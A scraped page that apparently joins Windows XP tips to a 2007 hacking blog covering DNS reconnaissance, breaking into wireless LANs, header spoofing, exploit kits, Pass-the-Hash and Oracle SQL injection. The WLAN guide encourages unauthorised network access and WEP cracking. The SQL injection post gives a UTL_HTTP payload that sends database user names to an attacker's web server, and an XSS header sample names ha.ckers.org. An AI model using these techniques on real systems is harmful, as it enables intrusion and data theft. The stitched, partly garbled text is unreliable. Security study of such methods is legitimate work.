What? You actually used the Briefcase in Win9.x/Me? OK, to get it back on the desktop in XP, go to C:\WINDOWS\system32\dllcache and double click on 'syncapp' to place it on your desktop.

If you've removed the Recycle Bin from the Desktop (see Registry Hacks, below), you can access it by either from a 'Desktop' Toolbar added by right-clicking on the Taskbar and choosing 'Toolbars' and putting a checkmark by that setting or by opening 'My Documents' & going up one level.

If you don't want XP to display the programs in the Start Menu that it determines are used most frequently, right-click in the empty space on the left side of the menu, choose 'Properties' then 'Start Menu' and Customize. Click on 'Clear List' and set number to zero.

Right–click My Computer, and then click 'Properties' then 'Advanced.' From here you can choose for what functions the greater portion of processing and power is used and set virtual memory if you're so inclined.

To place the programs you want permanently on the Start Menu, right-click on the program from the pop-up menu and choose 'Pin to Start Menu.'

For a quick desktop shortcut to any folder, file or application, find the target on your hard drive, right-click and choose 'Send to Desktop.'

New Tips for June, 2002
Shutting down WinXP is a three-click process, but it's easy to make it a single-click process, either from a desktop or Taskbar Icon. Right-click on the Desktop, choose 'New' then 'Shortcut. A window will pop up with a dialog box for the shortcut path. Type this exactly: C:\windows\system32\shutdown.exe -s -t 00 keeping in mind that the last character is a zero, not a capital O (to make a similar shortcut for restart, substitute /r for /s). Choose 'Next' and type in a name for your new shortcut. Right-click on your new shortcut, choose 'Properties' then 'Change Icon' to make it attractive. Leave it on your desktop or drag it to your taskbar.

If you haven't already found it, making the text background that appears beneath desktop icons transparent is a snap. Go to the Control Panel, choose 'System' then 'Advanced'. Click on the 'Performance' tab then 'Settings' and put a check in the 'Use Drop Shadows' box. Voila!

To keep those ugly lines from forming beneath the text on your desktop icons, go to the Control panel and choose 'Folder Options' to be certain that 'Underline icon titles consistent with my browser' is checked. Open 'Internet Options' then the 'Advanced' tab. Under 'Browsing' look for 'Underline Links' and choose 'Never.' Now, doesn't that look better?

Now that the 'official' release of WinXP has passed the six-month mark, some of you may be experiencing some performance degradation, the source of which can't be traced. Before resorting the the sure-fire re-format and re-install, try this simple procedure. Create a new user name (with Administrator rights). See if this 'New User' experiences better performance. If so, switch to your original user name, transfer settings and accounts to the 'New User' and enjoy the improved performance. Once you're satisfied that all settings and accounts have transferred properly, eliminate your old user name and run RegCleaner to eliminate outdated settings.

Boot Disk Returns
Unlike Win2000 or WinMe, WinXP can and will produce a boot disk. Stuff a floppy into the drive, open 'My Computer' then '3 1/2" Floppy Drive,' right click and choose 'Format'. From the drop-down menu, choose 'Create Startup Disk.'

Microsoft Sez:
"Customer research shows a frequently requested feature that users want from their PCs is fast system startup, whether from cold boot or when resuming from standby or hibernation." If you're not booting in less than 30 seconds, go here & get the MSoft tool that will speed up boot times with varying but (to my knowledge) never negative results

Save Streaming Media
It's cool to listen to MP3s (or watch movies) over the Internet. Often, saving this media, however, seems impossible. Hey, if it plays on your computer, it's on your hard drive. Once the file is fully loaded and with folder view set to show hidden and systems folders, search for the media (.mp3 or .mpg). There it is!

IE 6 Stuff
New security features in IE 6.x are cool, but if you'd rather not have the web pages you've viewed to be stored on your computer, you have to choose the option manually. From the 'Tools' menu, select 'Internet Options,' then 'Advanced.' Under 'Security,' check 'Empty Temporary internet files folder when browser is closed.'

If you prefer Google (as most do) as the search engine of choice, put the page on your hard drive ('File/Save As' from IE 6.x), then open the saved with the browser and from 'Tools/Internet Options/General,' choose 'Use Current' to have IE load instantly and already Googlized

Fierce domain scan

2007-12-14T07:07:00.000-08:00

Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that is non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.

First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.

First it queries your DNS for the DNS servers of the target. It then switches to using the target's DNS server (you can use a different one if you want using the -dnsserver switch but this can cause problems if the server you use won't tell you information about other people's sites and of course you won't find much relevant internal address space). Fierce then attempts to dump the SOA records for the domain in the very slim hope that the DNS server that your target uses may be misconfigured. Once that fails (because it almost always will) it attempts to "guess" names that are common amongst a lot of different companies. Don't ask me where I got the list, it's just a list of names that id and I have seen all over the place. I thought about adding a dictionary to this, but I think that would take a lot longer, and given that very few of the words are dictionary words I don't think this would add a lot of value.

Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.

I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.

Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:

perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts

I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.

perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com

As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.

perl fierce.pl -dns example.com -wide -file output.txt

Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already ran this without the connect scan turned on.

perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt

Here's what a sample header file might look like. The sample file below is attempting to exploit the Expect cross site scripting vulnerability:

GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: This is remote text via xss.js located at ha.ckers.org HstCla209156=1233232127602; HstCnv209156=1; HstC1p209156=1233231552571; HstCup209156=2; c_ppu_209156=2; c_old_pagid_209156=0

Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.

perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt

Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for it's mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:

mail.ru - 418 entries and 303 hostnames found.
rambler.ru - 472 entries and 458 hostnames found.

Trust me, we've found far more interesting sites than these two in our tests, but I don't want to disparage any companies for their mistakes. I'm sure you can think of a few companies to test this against. The results can be pretty amazing. If you don't get many results, that could be one of three things, 1) you aren't scanning their corporate domain, you are only scanning their external domain which they only have one or two machines on 2) it's a very small company or 3) you typo'd the domain name (I haven't built any checks to make sure the domain you entered is valid).

Requirements: This is a PERL program requiring the PERL interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN:

perl -MCPAN -e 'install Net::DNS'
perl -MCPAN -e 'install Net::hostent'

Windows users: You can use Fierce under Windows if you use Cygwin with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop me a line.

Version: Fierce is currently at version 0.9.9 - Beta 03/24/2007

Download: fierce.pl

Download: hosts.txt

(Thanks to Robert E Lee for the help with this and to Michael Thumann's DNSDigger wordlist).

Getting started: perl fierce.pl -help

This may some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a pre-cursor to nmap, unicornscan or nessus as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.

LANJacking: the New Hacker Mecca

2007-12-13T06:50:00.000-08:00

Getting free Internet access through IEEE standard 802.11b wireless Ethernet LANs (often called Wi-Fi LANs or WLANs) is the newest and biggest ever hacker scene. In many areas you can get free access legally through Wi-Fi systems run by volunteers. Elsewhere, it’s the wild west all over again, with spammers, computer criminals, and mostly harmless hackers running wild on WLANs whose owners have no concept of what they are hosting.

First we will cover the easy stuff: how to break into a WLAN that doesn’t authenticate users (LANJacking). These are fairly common. To do this, get a laptop with a wireless NIC (WNIC). Configure your NIC to automatically set up its IP address, gateway and DNS servers. Then, use the software that came with your NIC to automatically detect and get you online.

For example, with an Orinoco NIC, in Client Manager set the SSID (service set identifier required to be able to exchange packets on that WLAN) to be "any" or "null." Then from the Advanced menu select Site Manager. That should show you all available Wi-Fi access points.

Once you are set up to detect WLANs, then for happiest hunting, start driving (wardriving) or walking (stumbling) around an area with businesses or apartment buildings. Susan Updike points out, "Don’t forget airports – many VIP lounges, etc. have wireless hubs accessible from inside the airport or even in the parking lots."

How do you know when you’ve gotten online? One way is to run an intrusion detection system that alerts you when you get any kind of network traffic.

An easier and faster way to find those access points and choose the one you want to use is to run Network Stumbler, at http://www.netstumbler.com. It shows you all Wi-Fi access points within range of you. Network Stumbler runs on Windows desktop and laptop machines, and Mini Stumbler runs on Wi-Fi-enabled PDAs. Netstumbler-like software is available for MacOSX with either an internal AirPort card or any PCMCIA Wi-Fi card at http://www.mxinternet.net/~markw/.

For NetBSD,OpenBSD,and FreeBSD you can get BSD-Airtools at http://www.dachb0den.com/projects/bsd-airtools.html.

If you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. A version of Kismet for is available for Linux. Kismet also supports FreeBSD, OpenBSD and MacOSX.

Following are examples from a wardriving session by William Marchand of UnixHQ (http://www.unixhq.org) using a Windows 2000 Professional laptop and Netstumbler.

Figure 1: Not connected yet.

However, he fires up Netstumbler and lo and behold, he sees Fig. 2.

LANJacking: the New Hacker Mecca

Figure 2: Bill is within range of a Wi-Fi access point on Channel 6. Details are in the right hand panel.

Figure 3: It looks like a strong signal.

Figure 4: Time to get online!

Figure 5: The deed is done.

If you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. A version of Kismet for Linux, Kismet also supports FreeBSD, OpenBSD and MacOSX in on the Überhacker CD-rom.

Kismet works with any 802.11b wireless card that is capable of reporting raw packets (rfmonsupport). These include any Prism2 based card (Linksys, D-Link, Rangelan, etc), Cisco Aironet cards, and Orinoco based cards. Kismet also supports the WSP100 802.11b remote sensor by Network Chemistry and is able to monitor 802.11a networks with cards using the Ar5k chipset. Here’s where it gets interesting. There is a version that allows you to deploy many Kismet sensors for distributed sniffing. Each "drone" sensor sends packets over a TCP connection to a Kismet server. Its output can be piped into Snort (http://www.snort.org) and some other Intrusion Detection Systems (IDS).

You can get an idea of where easy-access Wi-Fi access points exist in abundance at http://www.WiFiMaps.com/ and http://www.wigle.net/maps. If you hunt on foot, keep an eye out for chalk marks on sidewalks or walls. These often denote Wi-Fi access points.

If you would rather hunt while sitting in your hacker lab, you can get into WLANs that are tens of kilometers away by using a directional antenna. http://www.fab-corp.com/ is an example of a place where you can buy these.

There are many commercial products for detecting WLANs. They are often used in companies that have problems with employees setting up unauthorized access points. For example, AirMagnet (http://www.airmagnet.com/) can run on the iPAQ PDA, and detects problems such as a Wi-Fi access point advertising its SSID.

It is legal to detect WLANs, but not to use some of the wireless systems you may access. It is best to make sure a WLAN is open to the public before using it. However, unless it requires some sort of authentication to log on, law enforcement won’t waste time pursuing casual visitors to WLANs. If you do this and get busted anyhow, well, that’s the risk you take in any unauthorized computer access.

Now we come to the slightly hard part. How do you break in if the WLAN asks for some sort of authentication? Wired Equivalent Privacy (WEP) is a common way to authenticate, and can be broken in minutes if you have a computer with a reasonably fast CPU. Since some Wi-Fi hardware is incompatible with better ways than WEP to authenticate, chances are you can find a lot of WEP nets floating around.

Airsnort is an example of a program that cracks WEP keys. Once it has captured enough packets it can usually crack WEP in a second or so, if running on Linux with a reasonably fast CPU. Airsnort has varieties that run on BSD, Linux, OS X and Windows, and can be downloaded at http://airsnort.shmoo.com/.

Now we come to the super hard part: WiFi Protected Access (WPA). It’s the latest, greatest way to keep intruders from abusing Wi-Fi. It can work, for example, with Windows Remote Authentication Dial-In Services to authenticate users – and keep the uninvited out. At this writing no technique has been publicized to break it. However, if by the time you read this, a way has been discovered, here are some web sites that are likely to offer downloads of the tools that do it, and instructions for their use.

http://www.worldwidewardrive.org/

http://www.wardriving.com/

http://www.churchofwifi.com

http://www.nakedwireless.ca/

https://mailsrv.dis.org/mailman/listinfo/wardriving

This Guide has been excerpted from the upcoming Second Edition of Überhacker! How to Break into Computers, by Carolyn Meinel. You are welcome to post this Guide to your web site or forward it to other people. Happy hacking!

How to Fake out Web Servers

2007-12-13T06:45:00.000-08:00

Did you know that most web browsers dutifully identify themselves to every web site you visit? There's often a good reason for this. Some web sites will send you pages customized to give you better viewing with the type of browser you use. Some sites use your header information to choose what language to display. Some intrusion detection techniques even look at headers to get an idea whether a connection to a website is being made by a legitimate browser or by a clumsily programmed attack

If it bugs you to tell web sites everything your browser wants to tell them, here's how to fake them out.

Telnet! Yes, my favorite all purpose mostly harmless hacking technique is telnet. If you use Windows and have never used telnet, type Start --> Run --> type telnet in the window and hit enter. This will give you a black window with something like this in it:

Welcome to Microsoft Telnet Client.

Escape character is 'CTRL+]'

Microsoft Telnet>

Now here's a fun thing to do. At the telnet prompt, type "open happyhacker.org 80" . Now wait a few seconds and then hold down the Ctrl key and the c key with one hand and hit enter with the other.

This will give you something like:

HTTP/1.0 408 Request Timeout
Server: thttpd/2.20c 21nov01 on a Brickserver 2
Content-type: text/html
Date: Wed, 31 Jan 2007 13:23:03 GMT
Last-modified: Wed, 31 Jan 2007 13:23:03 GMT
Accept-Ranges: bytes
Connection: close

408 Request Timeout

No request appeared within a reasonable time period.

thttpd/2.20c 21nov01 on a Brickserver 2

Connection to host lost.

Now to get something better, instead you can type Start --> Run and type in "cmd". This gives an MSDOS windows and it looks something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Carolyn Meinel>

From here we can do something much more fun to unsuspecting webservers. Open Notepad and type this in two lines:

telnet happyhacker.org 80
GET /gtmhh/index.shtml

It won't work unless you have this in two lines! Next copy these two lines and at the MSDOS window prompt right click, choose paste, and then hit enter. This will display all the code that the webserver would normally send your browser.

OK, so why is this a big deal? You can get the same code just by using the "page source" command on your browser. However, you got this code without having to send the browser any extra headers. All you sent was the most basic web browser command, the "GET" command.

Even more important...!!!

You can go to jail warning: If you send a webserver a command that is designed to break into or crash it, you just might wind up being cellmate Spike's girlfriend. Yes, those nasty script kiddie websites offer exploits to send to webservers, and if you try them on about a thousand different websites you may eventually get unlucky and actually break in.

If you want to try out all sorts of weird commands against a webserver without breaking the law, you have permission to do it against this website, happyhacker.org and you can't get into any trouble because I own it and I set the rules, which are, basically, you can do anything you want, see if you can crash happyhacker.org or break in, it's OK with me, muhahaha!

Next, you can set up your web browser to send headers of your own design. This article by Eric Giguere is still useful for learning how to modify your browser's headers. He also has a link that displays a portion (not the entire thing) of your browser's headers. Using this link, I learn that my browser sent out this:

connection keep-alive
accept-language en-us,en;q=0.5
content-length 0
host www.ericgiguere.com
accept text/xml,application/xml,application/xhtml+xml,
text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
accept-charset ISO-8859-1,utf-8;q=0.7,*;q=0.7
keep-alive 300
cookie JSESSIONID=5CF0B8F73EB94ECA1D6AA324F2AA1ADC; __utma=13
5980773.912983502.1170270059.1170270059.1170270059.1;
__utmc=135980773;
__utmz=135980773.1170270059.1.1.utmccn=(organic)
utmcsr=googleutmctr=
change+browser+headers+Firefoxutmcmd=organic
user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
You can tell this doesn't show everything because it doesn't include the "GET" command.

Now let's say you would like to see absolutely everything your browser sends. You can do this by setting up a network sniffer on your own computer and use it to see everything that goes back and forth between your browser and a website. This can be especially interesting if you visit malicious websites, meaning those that try to break into your computer through your browser to install spyware and even worse Trojans that enable criminals to hide their nasty activities inside your computer. Check out http://www.winpcap.org/to learn about sniffers and for free downloads of sniffer tools.

Last on your home computer. You can direct your browser to it by typing "localhost" or "127.0.0.1" into your browser or your telnet connection.

In order to ensure that your Apache webserver saves the headers of your browser, you have to find the file named http.conf. Open it in notepad and look for the line:

CustomLog logs/agent.log agent

If there is a "#" in front of it this means Apache ignores it. If you delete the "#" then Apache will record the headers of visiting browsers, but only after you restart Abut not least, you can see what your headers look like by installing the free Apache webserverpache. Then after visiting it with your browser, you will find your headers in the agent.log file in the logs directory.

Of course after reading all this, you may wonder what the big deal is about forging headers. Or maybe you think this is super fun, in which case you must be a real hacker.

OK, so now lets go do fun stuff with the free Firefox browser. In the browser window type:

about:config

Scroll down the screen this displays to general.useragent.extra.firefox. and then double click on this line. You can change it to whatever you want. I change it from Firefox/2.0.0.1 to Lynx. Yes, most of you are too young to remember Lynx, but I'm a really, really ancient hacker and back when the Web was young we didn't have pictures and all that newfangled fancy stuff. The web was just words and links, and Lynx, which we ran from a Unix shell account (this was before Linux even!) was how we crawled the web.

Next I double click on general.useragent.locale and change en-US (meaning I want to see websites in English if they offer that option) to en-Lower Slobovia

Oh, pooh, it turns out all this does is change one of my headers to:

user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; Lower Slobovia; rv:1.8.1.1) Gecko/20061204 Lynx

This failure to totally fubar the headers tells me we can have much more fun if we use telnet or even netcat to directly connect to webservers. Then we finally can really, really fake out anyone who actually reads the logs.

You can get punched in the nose warning: Many intrusion detection and prevention systems look for really screwy browser headers. Make yours weird enough and you will make someone hopping mad -- and he or she might tell your online provider that you, yes you, sent evil headers. Yes, you can be tracked back to your home computer. If your online provider is terrified of hackers (could you actually be an evil, evil, criminal?) they might cancel your Internet service.

But lets get back to that Firefox about:config screen. Have you ever tried to enter a really weird URL you found on a hacker website into your browser and it didn't do what you expected? Your browser might be the culprit. Check out:

network.IDN.blacklist_chars

It lists all the characters your browser ignores. Many of these aren't even on your keyboard, although you can create them with a hex editor. Some of them you can't send through telnet, either. The ultimate solution to all that is netcat, a telnet-like program that is also good for lots of amazing, things. If you try really hard, netcat can enable you to do truly amazing "you can get punched in the nose" or "you can go to jail" stuff to webservers. Your choice.

Happy hacking!

2007-12-13T06:42:00.000-08:00

MSF eXploit Builder - Free Win32 Exploit Development Platform
The MSF eXploit Builder (MSF-XB) is a free win32 application (GUI) that wants to be an Exploit Development Platform. The main goal is to speed up the exploit development process, this is accomplished by using the powerful functionalities and neat design of The Metasploit Framework.

MSF-XB automatically generates MSF compliants exploits modules.

The MSF-XB package also includes for your convenience:

Fuzzers

TAOF, The Art Of Fuzzing v0.3.2
ProxyFuzz v0.1, Rodrigo Marcos
FileFuzz v1.0.2510.28439, iDefense
FTPfuzz v1.0, Infigo
WinFuzz v1.0.0.1, Fakehalo

Handy Tools

Findjmp2, Class101
branchseeker
Faultmon
mycrc
Sysinternals (Microsoft) PStools
wget.exe, GNU
xCmd (remotexec clone)
nc.exe
A local database of opcodes/return addresses (Cross-platforms, 10 locales, fast and reverse queries)
An ASCII table
A lot of converters (Ascii, Hex, Byte, Unicode …)
Malcode Analyst Pack v0.2
Process Stalker, iDefense

REQUIREMENTS

Please edit and customize the MSF-XB.INI file
MSF-XB requires the Metasploit Framework installed to work properly (http://www.metasploit.com ): Version 3 is recommended
MSF-XB requires a debugger to be installed (Immunity Debugger)
You can download MSF eXploit Builder here:

MSF-XB.EXE (84Mb)
MD5 41e83b8cb8d60d689bff191eb7842fc1
SHA1 1cb0e457c9fa59da8f147a96afb9c1a056a4e655

scanrand - Download Stateless TCP Scanner with Syn Cookies

2007-12-13T06:40:00.000-08:00

scanrand - Download Stateless TCP Scanner with Syn Cookies
Scanrand is extremely quick and effective port scanner. It works by forking two distinct processes:

One to send the initial queries
One to receive responses and reconcile them from the above
This makes it extremely fast.

If you haven’t heard of the suite, Scanrand is one of the five tools in Paketto Keiretsu by Dan “Effugas” Kaminsky of Doxpara Research.

Scanrand implements numerous options; reasonable defaults are selected when no specific guidance is received from the user. The only thing mandated is a target destination, which may be specified using either a FQDN(Fully Qualified Domain Name) or a numeric specification.

These numerics may employ any number of dashes, commas, or combination thereof at the same time. For example, scanrand 10.0.1-255.1-10,20:80,137-139 works fine.

More ports will be scanned by default when scanning a single host than when sca
nning a network. Scanrand is able to estimate remote hopcount by examining incoming TTLs.

Note please to install scanrand you need to first install the provided libnet, libtomcrypt and libpcap tarballs.

It’s a good alternative to nmap for certain purposes.

You can read a good article on Scanrand here:

Scanrand Dissected: A New Breed of Network Scanner

The article includes nmap vs scanrand.

You can download Scanrand here (as part of Paketto):

-1.1paketto0.tar.gz

Serious flaws in players from microsoft and aol

2007-12-13T06:36:00.000-08:00

It looks like there is a fairly serious vulnerability in some of the popular media player packages out in the wild packaged as a MP4 file (due to the MP4 codec from 3ivx), it effects Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5.

All the more reason to use VLC! This follows fairly shortly after a couple of quite serious vulnerabilities in Quicktime.

Security researchers are warning that popular media players offered by Microsoft and AOL are vulnerable to attacks that can completely compromise a user’s PC.

Attack code has already been released for the bug, which has been confirmed in a codec used by older versions of Windows Media Player, made by Microsoft, and in AOL’s Winamp. A Symantec researcher has warned that users of other players may also be at risk because the vulnerability itself resides in a commonly used MP4 codec produced by a company called 3ivx Technologies.

“The exploit works by supplying victims with a maliciously formed MP4 file,” Raymond Ball wrote for Symantec’s DeepSight Threat Management System. “When a victim unknowingly clicks a link that appears safe, the MP4 content is delivered, causing the exploit to run.”

At least it’s not Microsoft’s fault this time, but they did use a dodgy codec so I guess some of the blame lays with them right?

They could have checked it out properly before bundling it into their software.

A researcher who goes by the name SYS 49152 released exploit code here, here and here that targets Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5. Each uses the 3ivx MP4 codec, which is vulnerable to a stack overflow.

Secunia describes the Windows Media Player vulnerabilities as “highly critical,” the second-highest rating on Secunia’s five-tier scale. The vulnerability reporting service didn’t have a rating for the Winamp vulnerability.

No patch is available. Ball recommends users remove the codec or disable media players that use the MP4 codec until the hole is plugged. That strikes us as overkill. Taking care not to click on suspicious links in browsers and email programs should suffice.

So watch out, attack vectors are getting more varied - don’t let your guard down during this merry season.

Exaggerating timing attacks results via get flooding

2007-12-13T06:34:00.000-08:00

thinking of an actual useful application for GET request flooding this evening. Normally we only think of GET requests as a binary thing - one at a time or flooding. But what if we only launched enough GET requests with the intention of impacting server load, not bandwidth latency. So picking the right URL would be critical here (DB impacts, most likely).

When you found the right URL, launching a GET request flood against the server could seriously delay certain types of requests (especially if they must touch a database two times versus one time, for instance - if the DB was part of the flooding). Suddenly something that is normally the difference of a few microseconds could be the difference of seconds. Who cares? Because I’m always curious if there are any practical applications in hacking for DoS and this appears to be one of them - at least in theory.

Pass the hash, NTLM style

2007-12-13T06:31:00.000-08:00

Pass the hash, NTLM style
Way back in 1997, a Windows exploit named "NT Pass the Hash" was posted on Bugtraq. This Unix-based tool was a modified SMB client that lets you use captured LanMan hashes, without having to decrypt them first.

After a mere ten years, someone has finally modernized this concept into a much more potent attack. Core Security has released Pass-The-Hash Toolkit, which runs on Windows and works with NTLM hashes. It's comprised of two key modules:

IAM.EXE - This tool "injects" another user's NTLM credentials into your current Windows logon session, given their username, Windows domain, and NTLM hash. You can then use the 'net' tools or any other Windows software that authenticates via NTLM, all under the assumed privileges of the compromised user account.
WHOSTHERE.EXE - Lists the usernames and NTLM hashes of all users logged on to a system.

No password cracking required! So if you own other systems on the network, you can just run whosthere.exe on them until you snag a domain admin's hashes. Or you could use a man-in-the middle attack, like the WPAD proxy exploit. As I discussed a few posts ago, the Metasploit guys covered several methods for grabbing NTLM hashes in their Tactical Exploitation presentation at BlackHat

Out-of-band Oracle SQL injection with HTTP Requests

2007-12-13T06:30:00.001-08:00

Out-of-band Oracle SQL injection with HTTP Requests
I spent most of last week performing a web application assessment in the middle of nowhere, Alabama. After the mad fun at BlackHat and several weeks of unpleasant documentation work preceding it, it was a nice change to spend five peaceful days completely focused on testing an interesting system.

This was an internal application, so I wasn't surprised to find that it was vulnerable to SQL injection in several areas. However, in-band injection attacks weren't working for the application I was testing - I couldn't use UNION SELECTs, for example, to merge my query results with data rendered in the browser. So I had to leverage an out-of-band technique for retrieving data through SQL injection: Oracle's UTL_HTTP.REQUEST function. David Litchfield mentioned this approach almost two years ago in Data-mining with SQL Injection and Inference, but I never had the need to use it "in the wild" until now.

UTL_HTTP is a built-in Oracle SQL function that issues HTTP requests. The syntax is pretty simple:

URL_HTTP.REQUEST('http://www.foo.com/index.php')
returns the first 2000 bytes from the provided URL. But the clever bit is that you can concatenate the URL with another SQL statement, the results of which will become part of the request.

For example, consider the following SQL:

UTL_HTTP.REQUEST('http://www.foo.com:80/'||(SELECT USERNAME FROM DBA_USERS WHERE ROWNUM=1))

The SELECT statement returns the value "SYS" - the first user in the DBA_USERS table. The HTTP request issued by the database is therefore for the URL "http://www.foo.com:80/SYS". In www.foo.com's HTTP access log, the request would look like:

158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
(assuming 158.72.4.21 is our target DB server)

So as an attacker, you simply need to run a web server and point the UTL_HTTP.REQUESTs to your own IP address. You can then view the result of each SQL injection in your server logs. If in Windows, I like to use SHTTPD as it is lightweight and simple to turn on and off.

The biggest limitation to this approach is that you can only query for one row at a time - you'll get an error message if your statement returns multiple rows. (That is due to the UTL_HTTP.RQUEST function itself, not the web server end). But it is still a lot more efficient then using blind SQL injection to brute force one character of a response at a time. Oracle will also throw an error if it can't reach your web server, which may be the case depending on network controls between yourself and the database. Experiment with running on different ports.

There are probably a few things you could do to make the attack more elegant, like setting up a CGI script on your server to better collect and parse the calls from the database. You could also create and inject a PL/SQL function that concatenates results from multiple rows to get around the single-row limitation. I needed a quick and dirty solution to get a few key database records, so I didn't bother venturing beyond the basics for this test.

Outbound HTTP requests originating from a database server should look suspicious, but I think the attack is obscure enough to slip by most admins.

Hijacking dns

2007-12-13T06:27:00.000-08:00

Restricting access to specific Internet web services is a challenge shared by all network administrators. Whether the reason for restricting access is based on security, bandwidth, or productivity, installing and maintaining proxy and content filter applications may be outside the budget of a small IT department.

The solution provided here offers a cumbersome approach for a small investment: $0.

All web services, such as HTTP, FTP, IRC, IM, NNTP and SMTP are predominantly called by name when end users want to access them. An internal DNS server usually hosts records for only the internal namespace. All external (Internet) namespace is generally forwarded to an ISP’s or other DNS server.

DNS hijacking on the LAN allows an administrator to redirect all Internet requests for a domain or server to an internal server or to nowhere (127.0.0.1).

HIJACKING GOOGLE

If an administrator wanted to hijack and redirect all users’ connections to google.com, he’d only need to add a Primary Lookup Zone for the domain name.

The steps for Server 2003 are as follows:

- Open the DNS console
- Expand your server
- Right-click Forward Lookup Zones and select New Zone.
- Click Next on the Wizard welcome page.
- Create a Primary Forward Lookup Zone. Do NOT integrate the zone with Active Directory if the option appears.
- Type the name of the zone: google.com
- Accept the default file name for the zone and click Next.
- Click Next.
- Click Finish.

Your DNS server is now authoritative for google.com. Instead of forwarding your clients’ DNS queries to the ISP DNS server, the server returns any records it holds in its own database. If the requested record does not exist, the DNS server tells the client that the name does not exist.

CREATE RECORDS

Create host records for the default namespace (i.e. google.com) and any hosts that you want to redirect (e.g. www.google.com). If you simply want the connections to die, saving any Internet bandwidth that would have otherwise been used, set the IP Address for each host record to 127.0.0.1. This will cause a client machine to attempt to connect to itself instead of the requested server. In most cases, this simply returns an error to the application that requested the Internet Server

Mail can be redirected by creating an MX record in the Zone you’ve chosen to hijack.

GETTING FANCY – REDIRECTION TO A BANNED ACCESS PAGE

An administrator can redirect all web requests to hijacked servers to an internal web page that reiterates the network policy. For example, when a user browses to www.google.com, he instead reaches a web page that proclaims, “You attempted to access an inappropriate web page. This action has been logged.”

If you want to get really sophisticated, you can use ASP.NET to build a neat page that reads the HTTP request and user token to personalize the page. If you are a masochist, you can tie it to a SQL database and log all transgressions.

CREATING THE BANNED ACCESS PAGE

- Install the Windows Web Service (Add/Remove Programs>Add/Remove Windows Components>Application Server)
- In C:\inetpub\wwwroot drop a web page saying nasty stuff to your end users. Name it default.html.
- Use this server’s IP address instead of 127.0.01 for all records you’d like to hijack.

BAD SOLUTION – GOOD PRICE

This solution is not scalable, dynamic or easy to maintain. But it is free. And it works.

WORKAROUNDS

If the client knows the IP Address of the remote server, he can still connect directly by IP Address.

